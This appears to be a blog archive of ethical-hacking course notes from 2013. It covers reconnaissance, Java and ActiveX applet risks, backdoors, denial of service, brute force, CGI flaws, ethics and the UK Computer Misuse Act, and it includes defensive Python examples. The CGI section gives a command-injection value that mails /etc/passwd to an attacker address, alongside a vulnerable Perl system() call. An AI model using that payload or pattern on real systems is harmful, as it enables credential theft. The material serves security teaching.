Thursday, 31 January 2013

ICANN



Introduction
ICANN, the Internet Corporation for Assigned Names and
Numbers, is a non-profit organization formed in 1998 to govern
and distribute IP addresses and domain names.
Domain names are registered with private organizations and managed
by organizations like Nominet (www.nic.uk) in the UK or Internic
(www.internic.net) in the US.
ICANN distributes IP addresses to the three Regional Internet
Registries (RIRs): ARIN, APNIC and RIPE.

Passive Information Gathering



The first stage when targeting a company is to gather as much
information as possible without the company knowing. Information
can be gathered from a number of sources and used in subsequent
stages to derive more in-depth information useful for an attack.
There are a number of Internet resources that can provide useful
information about the target company. Examples are:
• Regional Internet Registration databases.
• Domain name databases.
• EDGAR database.
• CNN news website.

What is Passive Information Gathering?

At this stage the information gathering is entirely passive. This means
that the company is not contacted or probed directly and will therefore
not be able to detect that anyone is gathering information about them,
even if they have Intrusion Detection Software (IDS) installed. The
information almost invariably comes from third-parties who publish
such information freely on the web.
On the Internet, there are valuable resources that can be used for
passive information gathering. These generally take the form of
databases holding current or archived company information. Because
these databases are publicly accessible, it is not illegal or unethical to
query them. Many such databases provide the facilities and tools to
allow this action. The company's homepage is also a valuable resource
and can potentially reveal sensitive information inadvertently left there
by the author, again without necessarily notifying the target company
that they are being investigated.

HTML Page Examination



HTML pages can be rewritten at the firewall so that no applet tags are
left in the HTML file. As a result, the browser will
never ask for an applet to be fetched across the firewall. The pitfall
associated with this is that JavaScript can be used to build applet tags
on the fly. Although there is no applet tag in the HTML file, the
browser's execution of JavaScript will cause one to be inserted at the time
the page is viewed.
Conclusion
There is no easy solution to make sure that executable content is
handled - and if necessary intercepted and discarded - in a secure
fashion. The pragmatic advice by most specialists for the moment
seems to be: turn it off. In other words, do not allow Java and ActiveX
applets to pass through the firewall by disabling them in the settings of
the Web browser and wherever it is possible to disallow them. Clearly,
this is just a temporary fix, which has to be examined considering the
future importance of distributed computing environments.

Java Class File Byte Sequence



Java class files can be recognized by a magic byte sequence that is
required at the beginning of every class file. The pitfall associated with
this is that Java class files may come as part of a compressed archive.
Due to the nature of compression, nothing in the archive exposes the
fact that it contains Java class files (even its name can be changed). Class
files that are part of an archive cannot be detected by this technique. In
addition, class files may be passed via an encrypted connection, which
will make them indistinguishable from ordinary files to the firewall.

Java Class Extension

Java class files can be recognized by their .class filename extension. The
pitfall associated with this is that depending on the browser, this may
either not be the case, or, again can be circumvented by sending applets
as part of an archive.
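
The two checks described above, written out as an added Python example (not code from the original page or from the Princeton group): a filter that applies the magic-byte and .class extension tests and also opens ZIP/JAR archives, the case both sections name as the pitfall. The function names, the size and depth limits and all sample data are assumptions constructed for illustration.

```python
import io
import struct
import zipfile

CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # first four bytes of every Java class file
MAX_DEPTH = 3                      # assumed limit on archives nested in archives
MAX_MEMBER = 8 * 1024 * 1024       # assumed per-member size cap (zip-bomb guard)


def is_class_file(data: bytes) -> bool:
    """Magic check plus a version sanity test.

    Mach-O universal binaries share the 0xCAFEBABE magic. In a class file
    bytes 6-7 hold the major version, which has been >= 45 since JDK 1.0.
    """
    if len(data) < 8 or data[:4] != CLASS_MAGIC:
        return False
    _minor, major = struct.unpack(">HH", data[4:8])
    return major >= 45


def scan(name: str, data: bytes, depth: int = 0) -> list:
    """Return (path, reason) findings for one object passing the filter."""
    findings = []
    if is_class_file(data):
        findings.append((name, "class magic"))
    elif name.lower().endswith(".class"):
        findings.append((name, "class extension only"))
    # is_zipfile looks at the archive structure, so a renamed JAR is still found.
    if zipfile.is_zipfile(io.BytesIO(data)):
        if depth >= MAX_DEPTH:
            return findings + [(name, "nesting too deep, not inspected")]
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                path = f"{name}!{info.filename}"
                if info.is_dir():
                    continue
                if info.flag_bits & 0x1:
                    # Encrypted content cannot be inspected: report it, do not pass it silently.
                    findings.append((path, "encrypted member, not inspected"))
                elif info.file_size > MAX_MEMBER:
                    findings.append((path, "oversized member, not inspected"))
                else:
                    findings += scan(path, archive.read(info), depth + 1)
    return findings


def make_zip(members: dict) -> bytes:
    """Build an in-memory archive (constructed sample input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        for member_name, content in members.items():
            archive.writestr(member_name, content)
    return buf.getvalue()


# Constructed samples: a class-file header only (not a loadable class),
# the same bytes hidden in an archive under a neutral member name,
# that archive wrapped in a second archive, and a Mach-O universal header.
SAMPLE_CLASS = CLASS_MAGIC + struct.pack(">HH", 0, 52) + b"\x00" * 16
SAMPLE_JAR = make_zip({"a.dat": SAMPLE_CLASS, "readme.txt": b"hello"})
NESTED = make_zip({"inner.bin": SAMPLE_JAR})
FAT_MACHO_HEADER = CLASS_MAGIC + struct.pack(">I", 2)

if __name__ == "__main__":
    for label, blob in [("Hello.class", SAMPLE_CLASS), ("photo.gif", SAMPLE_JAR),
                        ("x.bin", NESTED), ("tool", FAT_MACHO_HEADER)]:
        print(label, scan(label, blob))
```

A filter of this kind still sees nothing when the transfer itself is encrypted, which is the second limitation the text describes.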

ActiveX Security


Unlike Java, ActiveX does not have a sandbox in which to confine
potentially dangerous applets. An ActiveX program can do anything
done by other programs, for example:
• Run and delete files
• Send e-mail and faxes
• Activate other programs
Security is based on what is called 'an Authenticode System' and 'Code
Signing'. Unfortunately, the authentication certificates that should
endorse the digital signatures provide little or no assurance
whatsoever, because of the way the certification is implemented. When
an ActiveX-enabled browser runs an ActiveX applet, it:
1. Examines the digital signature.
2. Supposedly verifies the signature.
3. Executes the applet upon verification.
4. Asks for the user's permission to run the applet if the signature is
not pre-authorized.
5. Runs the program without doing any further checks on how the
applet might affect the user's system.
ActiveX Security Summation
Since one cannot have confidence in the authentication mechanism,
applets should be regarded as insecure. Rogue ActiveX applets have
already caused quite a bit of havoc. Examples include Runner, which
starts the command.com program and consequently runs any
command on the PC. Cuss-out goes into the e-mail program and sends
out crude letters to the last ten people who were e-mailed. The nasty
thing is that this usually passes unnoticed unless one gets a response.
Solutions
Suggested solutions have involved the use of firewalls. For instance, a
few techniques were suggested by the Princeton group to detect Java
applets at the firewall and ways to circumvent them:
• Examine byte sequence in Java files.
• Search for .class file extensions.
• Parse HTML pages.

ActiveX



Microsoft’s ActiveX is a programming language used for creating
Windows applets. Applets are compiled, executable binary programs,
which can perform actions roughly similar to those of a Windows
application within a browser, such as:
• Viewing Microsoft Word and Excel files.
• Invoking VBScript programs
• Manipulating items on a computer including display, files, hard
drive content and CPU activity.
ActiveX is mainly used in Web pages to provide animation and
interaction that occur on the user's PC. ActiveX applets can be linked
from:
• HTML files and mark-up tags.
• Text.
• Graphics.
• Audio.
• CGI scripts.
• Other Web pages and Java applets.
As with any executable content, security concerns have to be raised.

Java Sandbox



Another layer of security protection is commonly referred to as the
sandbox model: untrusted code is placed in a sandbox, where it can
play safely and without doing any damage to the real world, or the full
Java environment. When an applet or other untrusted code is running
in the sandbox, there are a number of restrictions on what it can do.
The most obvious of these restrictions is that it has no access to the local
file system.
Security Manager
The Security Manager class enforces a number of other restrictions. All
the core Java classes that perform sensitive operations, such as
filesystem access, first have to ask permission of the currently installed
Security Manager. If the call is being made by untrusted code, the
security manager throws an exception, and the operation is not
permitted.
Digital Signatures
Finally, by attaching a digital signature to Java code, the origin of that
code can be established in a cryptographically secure and unforgeable
way. If a person or organization is specified to be trusted, then code
that bears the digital signature of that trusted entity is also trusted,
even when loaded over the network. It may also be run without the
restrictions of the sandbox model.

Java Virtual Machine (JVM)

All in all, Java security is the task of the Java Virtual Machine in the web
browser, which means that once again security is placed in a layer
above the operating system. All now rests on the integrity of that
operating system. Additionally, a lot of bugs have been reported by the
Princeton Secure Internet Programming Group, often consisting of
breaking the type system.

Java Security Summation

It turns out that the security mechanisms described cannot give us
enough assurance. Hence, there are many reasons to stay nervous
about letting applets through a firewall and into a browser. If security
is of paramount importance, applets should be blocked.

Java Security



It is interesting to note that until a few years ago, security concerns
were raised about downloading data: do they contain viruses, or maybe
Trojan horses? The advent and popularity of Java has created a new
paradigm: downloaded content can now also be executable.
Java developers have tried to address security by implementing a few
mechanisms, which are supposed to remove the risks of executing
untrusted code:
• Memory access.
• The Java Sandbox.
• The Byte-code Verifier.
• The Applet Class Loader.
• The Security Manager.

Memory Access

Java developers have often promoted Java as a secure language. At the
lowest level, security goes hand in hand with robustness. Java
programs cannot:
• Forge pointers to memory
• Overflow arrays
• Read memory outside the bounds of an array or string

These features are supposed to be the main defences against malicious
code. It has been argued that by disallowing direct access to memory, a
huge, messy class of security attacks is ruled out.
Byte-code Verification
The second line of defence against malicious code is the byte-code
verification procedure that the Java interpreter performs on any
untrusted code it loads. The verification procedure should ensure that
the code is well formed. For example, it should not overflow or
underflow the stack or contain illegal byte-codes. If the byte-code
verification step was skipped, inadvertently corrupted or maliciously
crafted byte-codes might be able to take advantage of implementation
weaknesses in a Java interpreter.

The Dangers of Mobile Code


General

Because of the universal use of e-mail and WWW, it is impossible for
any security administrator to guarantee that no malicious external files,
programs or data will reach the internal network. Primary culprits for
Web-based intrusions are applications using the Java and ActiveX
programming languages. These languages allow Web sites to
incorporate programs that users can run on their computers, in other
words: remotely compiled programs are executed locally. It is not
surprising that one should be rather nervous about executing untrusted
code on one’s private network or machine.
Java
Java is a high-level, object-oriented, general-purpose programming
language that took the Internet by storm, because it was one of the first
technologies that could animate Web pages and make them interactive.
Designed by Sun Microsystems in 1990, it is similar to C++, but it
eliminates many language features that can cause common
programming errors.
Java source code files (files with a .java extension) are compiled into a
format called bytecode (files with a .class extension), which can then be
executed by a Java interpreter. Java can be used to develop complete
applications, called Java applets, which can perform a variety of tasks
from the same Web page:
• Animations.
• Games.
• Charts.
• Interactive programs.
Let us see how this works in a Web browser on a desktop computer.
References to Java software are embedded on a Web page, which can be
stored on a local disk or on the network. When the browser sees these
references, it performs the following procedure:

• The Java software, i.e. the applet, is loaded.
• The applet is then processed by the Java Virtual Machine (JVM),
which is built into the browser.
• This JVM does stringent security checks.
• The JVM runs the applet, which appears and interoperates inside
the browser.
The computer's operating system provides machine-specific support
for many of the actual operations and interactions.

Backdoor and Trojan Development



As intrusion detection and firewalling technologies have improved, so
have the backdoor programs. The simple TCP based remote shell
utilities have been superseded by UDP and ICMP based programs that
support encrypted data channels. The ability to control these backdoors
with UDP packets allows them to be deployed behind firewalls that
allow UDP traffic, typically for DNS on port 53. Similarly, if the firewall
in question allows ICMP packets through, these can be used to
communicate with the backdoor programs. The use of encrypted data
channels means that intrusion detection software can no longer inspect
the packet data for signatures, making detection of these backdoors
even more difficult.

Deployment

Backdoors can also be deployed on “virgin” systems without having to
first compromise them through other means. This can be accomplished
by embedding the backdoor in an email attachment, ActiveX control or
a file on the internet. Utilities such as Silkrope and Saranwrap exist,
which allow the attacker to attach the Trojan to a seemingly legitimate
file.
Well-known backdoor programs on the Microsoft Windows platform
include:
• BackOrifice.
• NetBus.

Backdoors and Trojans


Subverting Client Side Scripting

Client side scripting in the form of JavaScript or VBScript is sometimes
used to perform input validation. This has the advantage that the user is
immediately notified when incorrect data is entered, and doesn’t have
to wait for the form to be submitted before receiving feedback.
Input validation done at this level presents serious security flaws, as the
client side source code is available and editable by the end user. By
simply removing the restriction on character sets and input length,
buffer overflow and command execution attacks can then be attempted.
Client side input validation should always be used as an added feature
to server side validation and should not be considered a replacement.
Very poorly written client side scripts sometimes contain usernames
and passwords which can be used to gain access to the system.

Backdoors and Trojans

Trojans and backdoor programs are becoming an increasingly popular
method for gaining unauthorized access to remote systems. Backdoors
offer the attacker an easy way of accessing a remote system, without
having to rely on exploits or other security vulnerabilities.
The simplest backdoors take the form of command shells listening on
unusual ports. A commonly used tool is NetCat, which is available on
both the Windows and Unix platforms. Once NetCat is installed and
listening on port XXXX, the attacker need only telnet to port XXXX and
be presented with a remote command shell.

CGI and WWW Services



As more websites offer interactive services, more CGI and web based
vulnerabilities are being uncovered. CGI vulnerabilities fall into three
categories:
• Buffer overflow.
• Command execution.
• Subverting client side scripting.

Buffer Overflow

Standard buffer overflow techniques can be applied to CGI scripts.
Since scripts allow for user input, this input could be used to overflow
buffers in vulnerable programs. This only affects scripts written in
relatively low level languages such as C. Scripts should always perform
validation on all user input and internal functions should do sanity
checking on the size of buffers. Higher level, and more commonly used
scripting languages perform bounds checking on variable and array
lengths internally and will consequently not be vulnerable to buffer
overflow attack. Examples of such languages are:
• Java.
• Perl.
• Python.

Command Execution

Scripts written in higher level languages sometimes contain more
insidious vulnerabilities than their low level cousins. A common
occurrence of this is command execution on the remote machine. This is
once again caused by poor input validation. For example, CGI scripts
sometimes contain code that executes shell commands, such as the Perl
call:
system("mail $email < theTermsAndConditions.txt");
This is a simple way of mailing a document to a user. In this example
the $email variable will contain an email address that was entered in a
form on the website. If no input validation is done when the user enters
her email address, it will be possible to embed shell commands into the
input field and have them executed by the system call.
hacker@hack.net < /etc/passwd;
Inserting the above value will cause the password file to be mailed to
the attacker. As with buffer overflow attacks, the level of privilege with
which these commands are executed depends on the privilege
level of the CGI script.
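
The server-side counterpart to the two passages above (client side validation that can be removed, and the unvalidated mail call), as an added Python example that is not code from the original page. It rebuilds the string the Perl call hands to the shell, then shows the same step with the address validated on the server and passed as a single argument with no shell involved. The function names and the deliberately strict address pattern are assumptions.

```python
import re
import subprocess

TERMS_FILE = "theTermsAndConditions.txt"  # file name from the page's example

# Assumed allow-list, stricter than RFC 5322 on purpose: no whitespace, no
# shell metacharacters, and no leading '-' that mail could read as an option.
EMAIL_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+"
)


def vulnerable_command(email: str) -> str:
    """The string the page's Perl call passes to /bin/sh (built here, never run)."""
    return f"mail {email} < {TERMS_FILE}"


def validate_email(email: str) -> str:
    """Server-side check; runs regardless of what the browser script did."""
    if len(email) > 254 or not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected e-mail address")
    return email


def safe_argv(email: str) -> list:
    """Argument vector for mail: the address is one argv element, never shell text."""
    return ["mail", validate_email(email)]


def send_terms(email: str) -> None:
    """Mail the document without a shell; the file is attached as stdin directly."""
    argv = safe_argv(email)
    with open(TERMS_FILE, "rb") as body:
        subprocess.run(argv, stdin=body, check=True, timeout=30)


if __name__ == "__main__":
    form_value = "hacker@hack.net < /etc/passwd;"   # the value shown on the page
    print("shell would receive:", vulnerable_command(form_value))
    try:
        safe_argv(form_value)
    except ValueError as err:
        print("server-side validation:", err)
    print("accepted:", safe_argv("user@example.org"))
```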



Brute Force Attacks



These attacks are aimed at gaining access to a system by repeated
attempts at authentication. Most services that require a username and
password, and have no facility for account lockout, are vulnerable to
this type of attack.
Brute force methods are commonly used to crack password files, as this
can be done reasonably quickly on a local system. Common tools used
in this case are:
• crack - A Unix based program.
• L0phtcrack - A Windows based program.
Attacking network based services can be more time consuming as the
response time will depend heavily on the network load. Tools exist to
crack the following services:
• telnet.
• ftp.
• http.
• CGI logins.
To improve the chances of a successful brute force attack, one part of a
two part authentication is needed. This can be obtained from other
network or system vulnerabilities, e.g. finger or null sessions, or by
“dumpster diving” and other social engineering methods.

Dictionary Attack

Once a username has been established, it is expedient to first try a
dictionary based attack which tries words from various dictionaries
until a match is found. The dictionaries available vary in size and scope
as well as subject. There are themed dictionaries available, such
as Star Wars dictionaries, that can be used in conjunction with other
information to produce a more targeted attack.
Failing a dictionary attack, a true brute force method can be followed,
which attempts every combination of characters from a known subset
until a match is found. This can be very time consuming if this subset is
large or if the minimum password length is relatively long.
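
The account lockout facility whose absence the Brute Force Attacks section names as the weakness, as an added Python example that is not code from the original page. It counts failed logins per account in a sliding window and replays constructed authentication events through it; the class name, thresholds and events are assumptions.

```python
from collections import defaultdict, deque

MAX_FAILURES = 5   # assumed: failures allowed inside the window
WINDOW = 300       # assumed: seconds over which failures are counted
LOCKOUT = 900      # assumed: seconds an account stays locked


class LockoutPolicy:
    def __init__(self):
        self.failures = defaultdict(deque)  # username -> timestamps of recent failures
        self.locked_until = {}              # username -> time the lock expires

    def is_locked(self, user, now):
        return self.locked_until.get(user, 0) > now

    def record(self, user, success, now):
        """Process one authentication attempt; return 'ok', 'fail' or 'locked'."""
        if self.is_locked(user, now):
            return "locked"  # even the correct password is refused while locked
        if success:
            self.failures.pop(user, None)
            return "ok"
        recent = self.failures[user]
        recent.append(now)
        while recent and recent[0] <= now - WINDOW:
            recent.popleft()  # forget failures that fell out of the window
        if len(recent) >= MAX_FAILURES:
            self.locked_until[user] = now + LOCKOUT
            recent.clear()
        return "fail"


def replay(events):
    """Run (timestamp, username, password_correct) events through a fresh policy."""
    policy = LockoutPolicy()
    return [policy.record(user, ok, ts) for ts, user, ok in events]


# Constructed events: a dictionary run against one known username that would
# have found the password on its eighth guess, an ordinary user who mistypes
# twice, and a slow run paced to stay under the window.
DICTIONARY_RUN = [(t, "alice", False) for t in range(7)] + [(7, "alice", True)]
TYPO_USER = [(10, "bob", False), (20, "bob", False), (30, "bob", True)]
SLOW_RUN = [(t * 400, "carol", False) for t in range(6)]

if __name__ == "__main__":
    print(replay(DICTIONARY_RUN))
    print(replay(TYPO_USER))
    print(replay(SLOW_RUN))
```

The slow run is never locked out, so failed-login counts over longer periods still need reviewing in the logs, and because anyone can trigger a lock on a known username, lockout is usually paired with per-source throttling.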

Misconfigurations



Although exploits feature heavily in security related news, far more
successful attacks are conducted by abusing common
misconfigurations in network services. Network services should
always be configured with a “deny access by default” policy. The
opposite is often the case, which results in a number of services being
vulnerable to malicious attack.
Weak access controls on network services often lead to further privilege
escalation and eventual compromise of the system. This was illustrated
by the recent successful attack on the Apache web site. The attackers
exploited a poorly configured ftp server, which allowed write access to
the web site. This in turn allowed them to run a script via the web and
gain remote root access to the system.
By default, certain products, such as Checkpoint's Firewall-1, are
installed with settings that open them up to security vulnerabilities and
have to be specifically reconfigured to ensure their secure operation.

Abuse of Trust

Early networking protocols did not place a lot of emphasis on
encryption and authentication, as they were used in relatively small
networks. As these networks and systems formed part of the Internet, it
became possible to exploit weaknesses in these protocols.
An example is the use of a source IP address as the means of
establishing a trust relationship between two systems. Common attacks
exploit this weakness by spoofing the address of the trusted host and
thereby gain access to the trusting system and its resources. Typical
examples are NFS and the “r” utilities (rsh, rlogin).

Installing DDoS Software


There is a relatively standard procedure that is followed when
installing the DDoS software in preparation for an attack.
1. Previously compromised hosts have “zombie” agents installed on
them.
2. Another compromised host has the master controlling software
installed on it. This piece of software is configured to be aware of the
location of all the agents.
3. The last step is to install client software on the attacker's machine,
used to initiate the attack.
Initiating the Attack
The attack is typically initiated in the following manner:
1. The client communicates the IP addresses of the desired targets to
the master system.
2. This master system then instructs each of the agents to launch an
attack against the target using standard DoS techniques.
Early detection of these systems was possible by scanning machines for
the presence of agents and by sniffing network traffic to detect the
communication between the master and the agents.
Evolution of DDoS
As the DDoS tools have evolved, they now incorporate encryption as
part of the master to agent communication and allow agents to listen
on UDP ports, which only respond when sent a shared secret key. These
two enhancements make detecting these systems remotely a very
difficult task.

The Application Level Program Providing the Service



Network applications can be vulnerable to denial of service attacks in
the same way that operating systems are. If no allowances are made for
unexpected traffic or other input, the application could encounter a
condition where it hangs, and can no longer provide the service it was
designed for. Poor error handling in the code could lead to the same
result.
If the operating system does not take adequate precautions for extreme
conditions, it could be vulnerable to an attack that attempts to exhaust
the physical resources available on the system. Several such attacks
have been released which push the CPU to 100 percent utilization, and
thereby deny access to other services.
Distributed Denial of Service (DDoS) Attacks
Otherwise known as DDoS, these attacks have the same goal as
standard Denial of Service attacks but use a different architecture in
achieving it. A single host launching a network or application level
attack against a target is constrained by its own available network
bandwidth and system resources; a group of machines can be more
effective in a concerted attack. The current DDoS programs publicly
available all use the same basic architecture to control the attack,
common examples being:
• Stacheldraht.
• TFN.
• TFN2K.

Denial of Service (DoS) Attacks



Denial of Service or DoS attacks result in a specific service being made
unavailable to legitimate users. These attacks typically have one of
three targets:
• The network connection providing access to the service.
• The operating system hosting the service.
• The application level program providing the service.
The Network Connection Providing Access to the Service
Flooding the network with traffic leaves less bandwidth available for use
by the service. If enough bandwidth is consumed in this flood,
legitimate users are effectively denied access to the service.
Example
A typical example of this is the Smurf attack, where data is sent to the
broadcast address of a network, and the source address of the traffic is
specified as that of the target machine. This results in all the systems on
the network responding to the supposed source at the same time,
thereby generating huge amounts of traffic.
The Operating System Hosting the Service
Operating systems have been found to be vulnerable to denial of
service attacks. In the case of network based attacks this is caused by
the operating system's specific implementation of the networking stack.
A bug in this stack can cause the entire operating system to hang or
reboot when anomalous network traffic is encountered.

Example
A well known example is the Windows NT Out of Band attack (OOB),
which caused affected systems to produce the “blue screen of death”
when sent specific IP packets.
We can expect to see more vulnerable IP stacks appearing as the market
focus shifts to embedded Internet enabled devices, where each vendor
is using their own implementation of the IP stack.

Attack Types and Vulnerabilities


Introduction
There exist numerous ways to attack a target system. It could be
achieved by exploiting known vulnerabilities in software or taking
advantage of a badly configured security policy; it could be
implemented remotely or internally. The techniques and methods used
are likely to vary depending on the target and they should be chosen
appropriately having assessed the situation fully. The attack types and
vulnerabilities discussed in this module are:
• Buffer Overflow attacks.
• Denial of Service (DoS) attacks.
• Distributed Denial of Service (DDoS) attacks.
• Misconfigurations.
• Abuse of Trust.
• Brute force attacks.
• CGI and WWW services.
• Back doors and Trojans.
Buffer Overflow Attacks
These attacks exploit poorly written software to allow attackers to
execute arbitrary code on the target system. Overflows can occur in
server software which is available to users over the network, or in
programs which exist on multi-user operating systems. In either case, a
successful overflow will allow the attacker to execute arbitrary code
with the privilege of the vulnerable service.
The most sought after exploits in the hacker community are “remote
root” exploits; however, they are not as common as the local exploits. A
local exploit occurs in a service that is not available over the network,
but is shared by users in a multi-user operating system such as Unix.
This allows for the same escalation of privilege as that provided by the
remote exploits.

Typically Overlooked Issues



We hereby also give a list of issues that will normally not be picked up
in the average security audit. Examples are:
1. DNS Spoofing.
2. Third Party Trust.
3. Custom Trojan Horses.
4. Database.
5. Routing Infrastructure.
6. Testing the IDS.
7. WWW Server Side Includes.
8. TCP Hijacking.
9. Testing the Firewall.
10. ISDN Phone Lines.
11. Network Brute Force Testing.
12. Testing non-IP networks.
13. Ethernet Switch Spoofing.
14. Exploiting Chat Tools.

Conclusion of Hacking



On the other hand, using and demonstrating intrusion techniques
should be done with due care, in order not to promote them as a means
to break into other people’s systems. Other sites and system
administrators will take a very dim view of your activities if you decide
to use their hosts for security testing without advance authorization.
They would rightly take legal action against you if they perceive it as an
attack.
Typical scenario
It is always useful to use an external account to look at one’s own
systems from the outside. One of the most rewarding steps usually is to
gather as much information as possible about your own hosts. There is
a wealth of network services to look at: finger, showmount, and rpcinfo
are good starting points, but also look at DNS, whois, sendmail (smtp),
ftp, uucp, and as many other services as you can find.
One of the main issues that is most often overlooked is trust
relationships. There are many situations, for instance, when a server
(note that any host that allows remote access can be called a server) can
permit a local resource to be used by a client without password
authentication when password authentication is normally required.
Performing an assessment on your own systems should uncover such
weak links.
Although the concept of how host trust works is well understood by
most system administrators, the dangers of trust, and the practical
problem it represents, irrespective of hostname impersonation, is one of
the least understood problems we know of on the Internet. What is
rarely understood is how networking so tightly binds security between
what are normally considered disjoint hosts.
It is also interesting to note that common solutions to security problems
such as running Kerberos or using one-time passwords or digital
tokens are ineffective against many forms of attacks. While many of
these security mechanisms do have their use, one should be aware that
they are not a total security solution - they are part of a larger struggle to
defend your system.

Hacking



Introduction
Performing ethical hacking is arguably an unusual approach to system
security. However, performing an ethical hacking exercise, or in other
words, carrying out a security assessment on one’s own systems, has
some great benefits:
Hacker’s View of Security
Instead of merely saying that something is a problem, one actually
looks through the eyes of a potential intruder, and shows why it is a
problem. Such exercises can illustrate that even seemingly harmless
network services can become valuable tools in the search for weak
points of a system, even when these services are operating exactly as
they are intended to. By using techniques real intruders may use, one is
able to get a real-life view on possible access to one’s systems, and the
impact such access may have. Moreover, it can be carried out in a
’friendly’ environment, and using a structured, reproducible approach.
Enhancing IT Staff Security Awareness
System administrators are often unaware of the dangers presented by
anything beyond the most trivial attacks. While it is widely known that
the proper level of protection depends on what has to be protected,
many sites appear to lack the resources to assess what level of host and
network security is adequate. By showing what intruders can do to
gain access to a remote site, one can assist system administrators in
making informed decisions on how to secure their site - or not.
Better Response to Intrusions
Intrusion techniques often leave traces in system auditing logs:
examining them after trying some of these attacks out is useful to see
what a real attack might look like. It is also useful to examine the results
of two of the most effective methods of breaking into hosts: social
engineering and password cracking.

The Social Protector Argument



Argument
Hackers point out they break into systems to watch for instances of
data abuse and to help keep ’Big Brother’ at bay. The end justifies the
means.
Counterargument
Criminal activity cannot be condoned for the sake of raising awareness.
The proper authorities should make sure proper data protection and
ethics are enforced.
Conclusion of Ethics
In conclusion, we can state that most computer break-ins are unethical.
On the other hand, any system administrator or security administrator
is allowed to hack into his own systems. But why would he? We will
attempt to give some motivations for that in the next paragraph.

The Security Arguments



Argument

According to hackers, actual break-ins illustrate security problems to a
community that will not otherwise notice those very problems.

Counterargument
Reporting and explaining a vulnerability to the owner of a system
would illustrate the problem as well; breaking in cannot be justified.
Should burglars be allowed to break into houses in order to
demonstrate that door locks are not robust enough?
The Idle System Argument
Argument
System hackers often claim they are merely making use of idle
machines. Because a system is not used at any level near capacity, the
hacker is somehow entitled to use it.
Counterargument
Clearly, a remote intruder is not in a position to properly judge
whether a system is being underused or not. In any case, unused
capacity is often present for future needs and sudden surges in system
activity.
The Student Hacker Argument
Argument
Some trespassers claim they do no harm, and do not change anything;
they are merely learning how systems and system security work.
Counterargument
Hacking has nothing to do with proper computer science education.
Furthermore, ignorant users can unwittingly severely damage systems
they break into. Also, one cannot expect a system administrator to
verify that a break-in is done for educational purposes, and hence
should not be investigated.

Ethics


Introduction

Ethics is defined as ’the discipline dealing with what is good and bad
and with moral duty and obligation’. More simply, one could say it is
the study of what is right to do in a given situation. In the next
paragraph we will highlight why we see ethical hacking - or
performing a security assessment - on one’s own systems, as ’the right
thing to do’, i.e. as an essential part of good security practice.
However, it is interesting to have a closer look first at some of the
motivations (excuses) often put forward by hackers who try to gain
unauthorized access to someone else’s systems. Computer burglars
often present the following reasons in an attempt to rationalize their
activities as morally justified:

The Hacker Ethic

Argument
Many hackers argue they follow an ethic that guides their behavior and
justifies their break-ins. They state that all information should be free,
and hence there is no such thing as intellectual property, and no need
for security.

Counterargument

If all information should be free, privacy is no longer possible.
Additionally, our society is based on information whose accuracy must
be assured, hence free and unrestricted access to such information is
out of the question. Also, information is often collected and developed
at great expense.

Why Should We Care?


Surely with so many regulatory requirements and penalties for the
abuse of computer systems, nobody would dare to compromise your
system and risk heavy fines and/or imprisonment? The fact of the
matter is that cybercrime is on the increase and a successful attack on a
business can have devastating effects.
For instance:
• What is the effect of the publication of the presence of child
pornography on the servers of a supermarket chain?
• How difficult is it to regain a loss of reputation when a Web-site is
'slightly altered'?
• Do we care if my customers cannot buy books for 48 hours and have
their credit card details disclosed?
• Who cares if everyone's last salary review appears on the Intranet?
• What could happen if an outsider could read all your emails or
impersonate the Finance Director?

UK Computer Misuse Act, 1990

1990 Chapter 18
Unauthorized access to computer material:
1.
(1) A person is guilty of an offense if-
(a) he causes a computer to perform any function with the intent
to secure access to any program or data held in any computer,
(b) the access he intends to secure is unauthorized, and
(c) he knows at the time when he causes the computer to
perform the function that that is the case.
(2) The intent a person has to have to commit an offense under this
section need not be directed at

(a) any particular program or data,
(b) a program or data of any particular kind, or
(c) a program or data held in any particular computer.
(3) A person guilty of an offense under this section shall be liable on
summary conviction to imprisonment for a term not exceeding
six months or to a fine not exceeding level 5 on the standard
scale or to both.
2.
(1) A person is guilty of an offense under this section if he commits
an offense under section 1 above ("the unauthorized access
offense") with intent
(a) to commit an offense to which this section applies; or
(b) to facilitate the commission of such an offense (whether by
himself or by any other person); and the offense he intends to
commit or facilitate is referred to below in this section as the
further offense.
(2) This section applies to offences
(a) for which the sentence is fixed by law; or
(b) for which a person of twenty-one years of age or over (not
previously convicted) may be sentenced to imprisonment for a
term of five years (or, in England and Wales, might be so
sentenced but for the restrictions imposed by section 33 of the
Magistrates Courts Act 1980).
(3) It is immaterial for the purposes of this section whether the
further offense is to be committed on the same occasion as the
unauthorized access offense or on any future occasion.
(4) A person may be guilty of an offense under this section even
though the facts are such that the commission of the further
offense is impossible.
(5) A person guilty of an offense under this section shall be liable

(a) on summary conviction, to imprisonment for a term not
exceeding the statutory maximum or to both; and
(b) on conviction on indictment, to imprisonment for a term not
exceeding five years or to a fine or to both.
3.
(1) A person is guilty of an offense if -
(a) he does any act which causes an unauthorized modification
of the contents of any computer; and -
(b) at the time when he does the act he has the requisite intent
and the requisite knowledge.
(2) For the purposes of subsection (1)(b) above the requisite intent is
an intent to cause a modification of the contents of any computer and by so
doing -
(a) to impair the operation of any computer;
(b) to prevent or hinder access to any program or data held in
any computer; or
(c) to impair the operation of any such program or the
reliability of any such data.
(3) The intent need not be directed at-
(a) any particular computer;
(b) any particular program or data or program or data of any
particular kind; or
(c) any particular modification or a modification of any
particular kind.
(4) For the purposes of subsection (1)(b) above the requisite
knowledge is knowledge that any modification he intends to
cause is unauthorized.
(5) It is immaterial for the purposes of this section whether an
unauthorized modification or any intended effect of it of a
kind mentioned in subsection (2) above is, or is intended to
be, permanent or merely temporary.

(6) For the purposes of the Criminal Damage Act 1971 a
modification of the contents of a computer shall not be
regarded as damaging any computer or computer storage
medium unless its effect on that computer or computer
storage medium impairs its physical condition.
(7) A person guilty of an offence under this section shall be
liable-
(a) on summary conviction, to imprisonment for a term not
exceeding six months or to a fine not exceeding the
statutory maximum or to both; and
(b) on conviction on indictment, to imprisonment for a term
not exceeding five years or to a fine or to both.



How much hacking is there?


As we go about our daily lives, more and more of it is recorded or
managed by computer systems we have no control over. Not a week
goes by without some news headline whereby a system has been
